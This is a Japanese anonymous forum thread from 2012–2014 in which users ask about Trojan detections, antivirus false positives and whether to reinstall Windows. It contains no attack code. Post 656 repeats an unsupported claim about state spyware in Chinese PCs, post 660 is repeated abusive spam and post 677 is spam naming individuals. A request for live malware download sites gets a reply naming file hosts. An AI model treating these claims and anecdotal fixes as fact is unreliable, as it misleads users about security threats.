何かコレっていう可能性のものありますか?誤診断ですかね
655 :名無しさん@お腹いっぱい。:2012/09/13(木) 11:12:24.91
昨日から急にネットに繋がりにくくなったんだけど
何かに感染したのかな
特にプロバイダに障害発生してるわけじゃなさそうだし
スパイボットじゃ何も検出されなかったから
とりあえずアバストをインスコしてみる
何かに感染したのかな
特にプロバイダに障害発生してるわけじゃなさそうだし
スパイボットじゃ何も検出されなかったから
とりあえずアバストをインスコしてみる
656 :名無しさん@お腹いっぱい。:2012/09/18(火) 22:39:47.62
【IT】マイクロソフトが発見!中国製PCに出荷時からウィルス「中国製のパソコンや情報端末の購入には、慎重になったほうがいい」★2
http://uni.2ch.net/test/read.cgi/newsplus/1347879086/
************
可能性としてありうる。
1、中国製パソコンの画像データには以下の実行
プログラムソースがふくまれてる。
2、有事の際には中国当局からネットで全世界の
パソコンに指示を出し、機能停止が可能。
3、夜間定期的に送受信メールやテキストファイル、PDFの中身を
自動的にスキャンして、中国に対する不利益な動きに対し
自動的に中国当局に警報メールを発信する。もちろんIPアドレスから
そのPCの位置情報、個人情報のすべて。
4、上記を検出、ソース表示をしようとする動きに対し、フリーズ、暴走する機能内蔵
技術的にはすぐにでも可能。
というかすでに中国出荷の全PCやBIOS
のレベルでインスコ済みの可能性がある。
*********************
http://uni.2ch.net/test/read.cgi/newsplus/1347879086/
************
可能性としてありうる。
1、中国製パソコンの画像データには以下の実行
プログラムソースがふくまれてる。
2、有事の際には中国当局からネットで全世界の
パソコンに指示を出し、機能停止が可能。
3、夜間定期的に送受信メールやテキストファイル、PDFの中身を
自動的にスキャンして、中国に対する不利益な動きに対し
自動的に中国当局に警報メールを発信する。もちろんIPアドレスから
そのPCの位置情報、個人情報のすべて。
4、上記を検出、ソース表示をしようとする動きに対し、フリーズ、暴走する機能内蔵
技術的にはすぐにでも可能。
というかすでに中国出荷の全PCやBIOS
のレベルでインスコ済みの可能性がある。
*********************
657 :名無しさん@お腹いっぱい。:2012/09/21(金) 22:07:09.65
ウイルスがあるサイト教えてくれ
まだ残っててダウンロードできるサイトな
まだ残っててダウンロードできるサイトな
658 :名無しさん@お腹いっぱい。:2012/09/28(金) 17:35:15.61
AVGでトロイの木馬がreal playerで検出されたと出たのですが
real playerをアンインストールして再インストールしたら検出されなくなりました。
トロイの木馬は検出されたらリカバリーしない限り消滅することはないと聞いたので
誤検知のだったのでしょうか?
real playerをアンインストールして再インストールしたら検出されなくなりました。
トロイの木馬は検出されたらリカバリーしない限り消滅することはないと聞いたので
誤検知のだったのでしょうか?
659 :名無しさん@お腹いっぱい。:2012/09/30(日) 10:11:45.96
>トロイの木馬は検出されたらリカバリーしない限り消滅することはない
そんなデタラメだれが言ったんだよwww
トロイも他のウイルス同様、検知されても事前ブロックあるいは駆除/削除された場合は問題なし
しかし今回のreal playerの件はAVGの誤検知じゃねえのか?
(real playerは有名ソフトだし、昔からAVGはreal playerをよく誤検知している)
誤検知がどうかわからない時は落としたファイルをVirusTotalにかけて確認しろ
それで反応してるのがAVGだけとか、ごく少数のマイナー会社のソフトだけとか
そういう場合はまず誤検知だから
https://www.virustotal.com/
そんなデタラメだれが言ったんだよwww
トロイも他のウイルス同様、検知されても事前ブロックあるいは駆除/削除された場合は問題なし
しかし今回のreal playerの件はAVGの誤検知じゃねえのか?
(real playerは有名ソフトだし、昔からAVGはreal playerをよく誤検知している)
誤検知がどうかわからない時は落としたファイルをVirusTotalにかけて確認しろ
それで反応してるのがAVGだけとか、ごく少数のマイナー会社のソフトだけとか
そういう場合はまず誤検知だから
https://www.virustotal.com/
660 :名無しさん@お腹いっぱい。:2012/10/10(水) 15:38:51.48
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
そ・う・か
氏・ね
661 :名無しさん@お腹いっぱい。:2012/10/11(木) 10:19:13.10
検出率 誤検出数 ソフト名 http://www.av-comparatives.org/images/docs/avc_fdt_201209_en.pdf 2012/10/08更新 ウイルス240,859個の検出率
ADVANCED+ ★★★
99.8% 10個 Avira
99.6% *7個 Trend Micro(ウイルスバスター)
99.2% *5個 Kaspersky
99.2% 10個 BitDefender
99.2% 10個 BullGuard
99.2% 14個 eScan
98.8% 12個 McAfee
98.6% 11個 avast
ADVANCED ★★
99.9% 23個 G DATA
99.6% 20個 Panda
99.2% 11個 Fortinet
98.7% 19個 Sophos
98.5% 34個 GFI Vipre
97.4% *4個 ESET
STANDARD ★
98.0% 36個 AVG
94.9% *0個 Microsoft(MSE)
94.4% 15個 PC Tools
TESTED
95.6% 20個 AhnLab
80.0%以下 210個 Webroot
※圏外:Kingsoft
ADVANCED+ ★★★
99.8% 10個 Avira
99.6% *7個 Trend Micro(ウイルスバスター)
99.2% *5個 Kaspersky
99.2% 10個 BitDefender
99.2% 10個 BullGuard
99.2% 14個 eScan
98.8% 12個 McAfee
98.6% 11個 avast
ADVANCED ★★
99.9% 23個 G DATA
99.6% 20個 Panda
99.2% 11個 Fortinet
98.7% 19個 Sophos
98.5% 34個 GFI Vipre
97.4% *4個 ESET
STANDARD ★
98.0% 36個 AVG
94.9% *0個 Microsoft(MSE)
94.4% 15個 PC Tools
TESTED
95.6% 20個 AhnLab
80.0%以下 210個 Webroot
※圏外:Kingsoft
662 :名無しさん@お腹いっぱい。:2012/10/29(月) 19:38:05.92
質問なんですが、トロイの木馬に感染すると、アプリケーションが強制終了しちゃう事ってありますか?
友達が、今日イラストスタジオミニが強制終了しちゃって使えないと言っていて・・・
今日、その友達のUSBに入ってる画像を、私のパソコンに入れたら、少ししてトロイの木馬が検出されましたって出てしまったので、心配なんです
友達が、今日イラストスタジオミニが強制終了しちゃって使えないと言っていて・・・
今日、その友達のUSBに入ってる画像を、私のパソコンに入れたら、少ししてトロイの木馬が検出されましたって出てしまったので、心配なんです
663 :名無しさん@お腹いっぱい。:2012/10/30(火) 00:39:04.89
ウイルスバスターの体験版を使って見たら
system32のdll.dll(mcのファイルじゃない)から
TROJ_GEN.RCBC1INというウィルスが早速発見された
トロイの木馬なのは間違いないんだけど、
基本の対処法やら過去ログを漁って見たが消しては復活してばかり
もうリカバリーするしかないかな?
system32のdll.dll(mcのファイルじゃない)から
TROJ_GEN.RCBC1INというウィルスが早速発見された
トロイの木馬なのは間違いないんだけど、
基本の対処法やら過去ログを漁って見たが消しては復活してばかり
もうリカバリーするしかないかな?
664 :名無しさん@お腹いっぱい。:2012/10/30(火) 00:50:18.80
リカバリーしたら楽になる
665 :名無しさん@お腹いっぱい。:2012/11/05(月) 13:15:24.92
トロイの銀行
666 :名無しさん@お腹いっぱい。:2012/11/05(月) 14:32:21.45
667 :名無しさん@お腹いっぱい。:2012/11/05(月) 15:05:59.23
マカフィ大佐がトロイ駆逐してくれた
668 :名無しさん@お腹いっぱい。:2012/11/06(火) 14:53:28.00
トロイ入れられたなw
削除したけど
いじられたわw
どいつがやったか調査しないとw
削除したけど
いじられたわw
どいつがやったか調査しないとw
669 :名無しさん@お腹いっぱい。:2012/11/12(月) 17:45:25.96
消しても復活するとは知らなかったよ
怖すぎだろ・・・
怖すぎだろ・・・
670 :名無しさん@お腹いっぱい。:2012/12/01(土) 04:56:53.87
iPhoneでも感染するの?
671 :名無しさん@お腹いっぱい。:2012/12/04(火) 21:21:14.94
しない
672 :名無しさん@お腹いっぱい。:2012/12/12(水) 19:55:47.08
DHDからトロイが検出されたのですが対処法方がわかりませんたすけてください
673 :名無しさん@お腹いっぱい。:2012/12/14(金) 12:49:52.41
一般人にやるくらいなら
警察にやれよ
情報の宝庫だろ
警察にやれよ
情報の宝庫だろ
674 :名無しさん@お腹いっぱい。:2012/12/15(土) 01:06:05.67
>>2で終わってた←じゃあ続きのレスすんな
http://hayabusa.2ch.net/test/read.cgi/news4vip/1355498671/
http://hayabusa.2ch.net/test/read.cgi/news4vip/1355498671/
675 :名無しさん@お腹いっぱい。:2012/12/29(土) 02:03:32.96
runtime error 216 at 00003188これどーすりゃいいの・・・・・・・・・・・・・・・・・・・・・・・・・・・・・
676 :名無しさん@お腹いっぱい。:2013/01/04(金) 04:15:27.13
トロイウィルス感染後のCドライブの容量に関する質問です
先日私のPCはトロイの木馬ウィルスに感染してしまい、慌てて、私はすべての感染してしているファイルを削除してしまいました
そのせいか、Cドライブ(デスクトップ、ピクチャ、本体に関するプログラム系)に物を置けば当然容量は減っていくのですが
物を削除しても容量に反映されず、一向に増えません。すべてのファイルを見て計算した所20Gほど開きがあるはずなのですが
3Gほどしかありません。デフラグ等は無意味でした
おそらく大事なファイルか何かを削除してしまったためにこのような現象が起きているのだとは思いますが何か思い当たる方はいませんでしょうか?
OSはウインドウズセブンです
至急お願いします
先日私のPCはトロイの木馬ウィルスに感染してしまい、慌てて、私はすべての感染してしているファイルを削除してしまいました
そのせいか、Cドライブ(デスクトップ、ピクチャ、本体に関するプログラム系)に物を置けば当然容量は減っていくのですが
物を削除しても容量に反映されず、一向に増えません。すべてのファイルを見て計算した所20Gほど開きがあるはずなのですが
3Gほどしかありません。デフラグ等は無意味でした
おそらく大事なファイルか何かを削除してしまったためにこのような現象が起きているのだとは思いますが何か思い当たる方はいませんでしょうか?
OSはウインドウズセブンです
至急お願いします
677 :池田大作:2013/01/04(金) 06:10:29.94
創価諸君よ!
田浦本部横須賀桜山支部の偉大なる男子部
高橋裕之氏が1月10日と1月31日に宝くじ1等・前後賞が当たるように
また女子部と結婚成就と障害者年金1級受給と健康とご長寿と貯金残高10億円と刑事権力から護り抜く
祈りを毎日30分しっかりと高橋裕之氏に題目を送って行こうではありませんか!
特に飯田一家・柏崎まさかつ・徳永一家・宗像一家・尾崎一家・土井一家・尾島一家・横須賀総県創価学会員は喜んで祈るに祈っていこうではありませんか!
また女子部は何が起きても疑うことなく高橋裕之氏について行きなさい
いいね!
田浦本部横須賀桜山支部の偉大なる男子部
高橋裕之氏が1月10日と1月31日に宝くじ1等・前後賞が当たるように
また女子部と結婚成就と障害者年金1級受給と健康とご長寿と貯金残高10億円と刑事権力から護り抜く
祈りを毎日30分しっかりと高橋裕之氏に題目を送って行こうではありませんか!
特に飯田一家・柏崎まさかつ・徳永一家・宗像一家・尾崎一家・土井一家・尾島一家・横須賀総県創価学会員は喜んで祈るに祈っていこうではありませんか!
また女子部は何が起きても疑うことなく高橋裕之氏について行きなさい
いいね!
678 :名無しさん@お腹いっぱい。:2013/01/10(木) 08:15:17.47
■2012年11月のウイルス脅威 2012年12月13日 企業専門ウイルスニュース
トロイの木馬 (Trojan.Agent/Gen-他 Trojan:Win32/Symmi他)の多くには トロイの
実行ファイルをRecycle Binフォルダ内に置くことで、コンピューターに接続する全ての
リムーバブルデータストレージデバイスを感染させます。次に感染させたデバイス上の
フォルダを隠し、代わりに該当するファイル名の付いたショートカットを作成していきます
が、このショートカットがトロイの木馬の実行ファイルへとリンクされています。その結果、
感染したデバイス上にあるいずれかのフォルダを開こうとしたユーザーは、悪意のある
アプリケーションを起動させてしまうことになります。さらに、このトロイの木馬はデバイ
スのルートフォルダ内にautorun.infファイルを置くことができ、それにより、デバイスが
他のコンピューターに接続されるだけで自動的にトロイの木馬が起動して侵入します。
◆
トロイ(Trojan.Agent/Gen-他、Trojan:Win32/他)、この記事そのんまま、どえらい状態に!
ろいろ調べたら企業専門会社にトロイ記事が。
流行感染しているそうだ。HPを見るだけで感染、ニースサイトでも感染とか、ネットショップ
のページからも感染とか、事例はいろいろ。自分は初めてのネットショップ
で感染の心当たりが無い。
↓
症状
*自己増殖して動きまわり、CPUを100%使用するトロイ.EXEが何個も何十個も発生!動き周りパソコンは止まる!
*自己増殖したトロイのEXEファイルは、Applicaton Dataファイルに大量の●●.EXEを作っていた。
*※「タスクマネジャー」を開いて、動いている●●.EXEを停止させ、●●.EXEを削除。
*ネットが詰まってパンク状態。「接続の問題を診断」ボタンを押すと、「Winsockプロバイダ カタログに問題が・・・」と表示。
*一旦終了して立ち上げるとネットは1時間程は使えるが直ぐにパンクして繋がらない。今度はネットを占領している。
複数のウイルス対策ソフトを使ってトロイの木馬(Trojan)の全てを検出させ苦労して駆除
↓
USBメモリーを刺してもUSBメモリー内にトロイの木馬が侵入することは無くなった。
679 :名無しさん@お腹いっぱい。:2013/01/10(木) 17:29:39.66
あ
680 :名無しさん@お腹いっぱい。:2013/01/14(月) 22:20:03.80
ラクサナ・トロイが三角木馬に跨ってると聞いて…
681 :名無しさん@お腹いっぱい。:2013/02/01(金) 10:13:24.12
アンラボからESETに変えたら
システムメモリ > explorer.exe - Win32/SpamTool.Agent.Tの亜種 トロイの木馬
削除できませんって出るんですが、どうすればいいでしょう。
システムメモリ > explorer.exe - Win32/SpamTool.Agent.Tの亜種 トロイの木馬
削除できませんって出るんですが、どうすればいいでしょう。
682 :名無しさん@お腹いっぱい。:2013/02/17(日) 01:40:23.74
iPhoneでも感染はするのでしょうか?
よく確認もせず.asia踏んでしまったので不安です…
画像のダウンロードでも感染はありうるんでしょうか…
よく確認もせず.asia踏んでしまったので不安です…
画像のダウンロードでも感染はありうるんでしょうか…
683 :名無しさん@お腹いっぱい。:2013/02/25(月) 22:47:56.51
朝からクロームが勝手にリロードを繰り返すのでトレンドマイクロで調べたら
トロイの木馬が検出された
(2回やって2回とも)
夕方クロームを一度消してまた再インストールしたら勝手なリロード繰り返しがなくなったので
またトレンドマイクロで調べたら
「ウイルスは検出されなかった」とのこと。
これって最初の2回は誤検出ってことなのかな。
クロームが悪さしてただけ?
トロイの木馬が検出された
(2回やって2回とも)
夕方クロームを一度消してまた再インストールしたら勝手なリロード繰り返しがなくなったので
またトレンドマイクロで調べたら
「ウイルスは検出されなかった」とのこと。
これって最初の2回は誤検出ってことなのかな。
クロームが悪さしてただけ?
684 :名無しさん@お腹いっぱい。:2013/08/27(火) NY:AN:NY.AN
Trojan.LNK.Agent.E ってのを検出したけど駆除できない 助けて
685 :名無しさん@お腹いっぱい。:2013/08/28(水) NY:AN:NY.AN
うちのAviraちゃんがありとあらゆるファイルから
TR/Fake.AVを誤検出するんだけど
このFake.AVの正体ってなんなの?
TR/Fake.AVを誤検出するんだけど
このFake.AVの正体ってなんなの?
686 :名無しさん@お腹いっぱい。:2013/08/28(水) NY:AN:NY.AN
誤爆した…
すまぬ…すまぬ…
すまぬ…すまぬ…
687 :名無しさん@お腹いっぱい。:2013/10/21(月) 00:15:57.45
とろいからトロイの木馬なんかに感染するんだよ
688 :名無しさん@お腹いっぱい。:2013/12/06(金) 23:28:57.73
ウイルス/脅威: TROJ_SPNR.3CIT13
感染源: 脅威
影響を受けるファイル: C:\Users\省略\aDkf+B_D.exe.part
処理: 削除済み
スキャンの種類: リアルタイムスキャン
引っかかった。 なんだよこれ・・・。削除したけどトロイじゃバックドア
かけられてるかもしれねーからクリーンインストールするわ
めんどくせぇ。
感染源: 脅威
影響を受けるファイル: C:\Users\省略\aDkf+B_D.exe.part
処理: 削除済み
スキャンの種類: リアルタイムスキャン
引っかかった。 なんだよこれ・・・。削除したけどトロイじゃバックドア
かけられてるかもしれねーからクリーンインストールするわ
めんどくせぇ。
689 :名無しさん@お腹いっぱい。:2013/12/11(水) 15:44:37.15
>>657
君が望むようなウイルスかどうかわからんけど、ul.toとかuploading.com、そして
filefactory.comやextabit.comなどのアップローダーは、殆どが
マルウェアと呼べる自社製ダウンローダーを落とさせようと、標準仕様で、
「はい、ダウンローダーを使います!」にチェックが入ってる
uploading.comのとか、放って置くとダウンロード始まるらしい
あと、iLividとかいうソフトは「ダウンローダーとして使えねえ!単なるマルウェア!」という
評価を受けてるのを見た事がある
怪しげな違法ファイルサイトならまだうじゃうじゃウイルスがあるらしい
君が望むようなウイルスかどうかわからんけど、ul.toとかuploading.com、そして
filefactory.comやextabit.comなどのアップローダーは、殆どが
マルウェアと呼べる自社製ダウンローダーを落とさせようと、標準仕様で、
「はい、ダウンローダーを使います!」にチェックが入ってる
uploading.comのとか、放って置くとダウンロード始まるらしい
あと、iLividとかいうソフトは「ダウンローダーとして使えねえ!単なるマルウェア!」という
評価を受けてるのを見た事がある
怪しげな違法ファイルサイトならまだうじゃうじゃウイルスがあるらしい
690 :名無しさん@お腹いっぱい。:2014/01/27(月) 02:46:41.78
iPhoneで感染するんでしょうか?変なURL見てしまいました。
691 :名無しさん@お腹いっぱい。:2014/02/09(日) 11:51:11.95
www.kingfiles.netって所の「自社製プログラム」、
もしかしてトロイ?
もしかしてトロイ?
692 :名無しさん@お腹いっぱい。:2014/02/21(金) 19:37:40.63
情報弱者ですいません。
少し前に検索し、16こ出てきたJAVA_exprloyt.blyというファイルと、トロイの木馬のヤバさ、注意点、対応法を教えてください。
少し前に検索し、16こ出てきたJAVA_exprloyt.blyというファイルと、トロイの木馬のヤバさ、注意点、対応法を教えてください。
693 :名無しさん@お腹いっぱい。:2014/02/22(土) 00:18:03.00
@葵という人物が、犯罪に合い、それを苦にして自殺してしまう
A葵という人物を、襲った犯人は立花善次である
B葵の自殺により、母親は精神が壊れてしまう
C桜宮一家による、立花善次への復讐劇がある
D葵という人物は、自殺して死んだ後も防腐処理され美しい姿を保ち、物語の死と生を包む神秘性や象徴や偶像として存在する
A葵という人物を、襲った犯人は立花善次である
B葵の自殺により、母親は精神が壊れてしまう
C桜宮一家による、立花善次への復讐劇がある
D葵という人物は、自殺して死んだ後も防腐処理され美しい姿を保ち、物語の死と生を包む神秘性や象徴や偶像として存在する
694 :名無しさん@お腹いっぱい。:2014/03/10(月) 21:50:43.36
トロイを見つけて削除した後ってリカバリしたほうがいいの?
695 :名無しさん@お腹いっぱい。:2014/03/27(木) 08:00:48.78
696 :名無しさん@お腹いっぱい。:2014/03/29(土) 16:04:09.07
>>694
いちいちリカバリするバカなんてほとんどいない
セキュリティソフトが見つけて隔離あるいは削除した段階で終了
ついでにMalwarebytes' Anti-Malwareあたりでスキャンして何もなければまず安心
いちいちリカバリするバカなんてほとんどいない
セキュリティソフトが見つけて隔離あるいは削除した段階で終了
ついでにMalwarebytes' Anti-Malwareあたりでスキャンして何もなければまず安心
697 :名無しさん@お腹いっぱい。:2014/04/19(土) 00:47:36.98
昨日、いきなりアクションセンターがトロイが検出したって騒ぐから開いてみて指示のまま削除したんだが・・・
これで良かったのだろうか?
調べてみるとなぜか半年くらい真のファイルからもトロイが検出されたんだけど・・・
まともなセキュリティソフト入れてないから知らん内に入れられたのかな
これで良かったのだろうか?
調べてみるとなぜか半年くらい真のファイルからもトロイが検出されたんだけど・・・
まともなセキュリティソフト入れてないから知らん内に入れられたのかな
698 :名無しさん@お腹いっぱい。:2014/05/06(火) 11:52:58.75
トロイに引っかかるヤツはトロイから。
699 :名無しさん@お腹いっぱい。:2014/05/18(日) 10:26:10.24
今朝パソコンを開いてセキュリティソフトを見たら、
トロイの木馬を検出、駆除しましたのなってたのですが
トロイの木馬に悪さをされたかどうかわかりますか?
トロイの木馬を検出、駆除しましたのなってたのですが
トロイの木馬に悪さをされたかどうかわかりますか?
700 :名無しさん@お腹いっぱい。:2014/05/18(日) 11:09:31.17
手動スキャンして問題ないなら大丈夫じゃないの?
何ならそのトロイがどのようなものか名前で調べてみるとか。
何ならそのトロイがどのようなものか名前で調べてみるとか。
701 :名無しさん@お腹いっぱい。:2014/05/18(日) 21:03:30.97
以前、怪しいサイトでクリックしたときは、
即座にセキュリティソフトの「トロイの木馬を検出、削除しました」というアラートが出たのですが
今朝明け方、PCをつけたままで寝ていた間に、
セキュリティソフトの定期スキャンでトロイの木馬が発見されたらしく削除、隔離となっていました。
即座に検出された場合はPCにほぼ害はなさそうですが
定期スキャンで発見されるような場合は一定期間PC内にトロイの木馬がいて
何か悪さをした可能性が高いのでしょうか?
また、PC内に入った時に気は検出できず、なぜ定期で検出されたのでしょうか?
よろしくお願いします。
即座にセキュリティソフトの「トロイの木馬を検出、削除しました」というアラートが出たのですが
今朝明け方、PCをつけたままで寝ていた間に、
セキュリティソフトの定期スキャンでトロイの木馬が発見されたらしく削除、隔離となっていました。
即座に検出された場合はPCにほぼ害はなさそうですが
定期スキャンで発見されるような場合は一定期間PC内にトロイの木馬がいて
何か悪さをした可能性が高いのでしょうか?
また、PC内に入った時に気は検出できず、なぜ定期で検出されたのでしょうか?
よろしくお願いします。
PC見たらOutlookが勝手に起動してて北朝鮮〜って題名でメール送ろうとしてたんだがかなりまずい状況だよね
Outlookは設定して無かったのでメールは送れなかったようだが…
Msse見たらトロイの木馬を検出しましたとなっていた
Outlookは設定して無かったのでメールは送れなかったようだが…
Msse見たらトロイの木馬を検出しましたとなっていた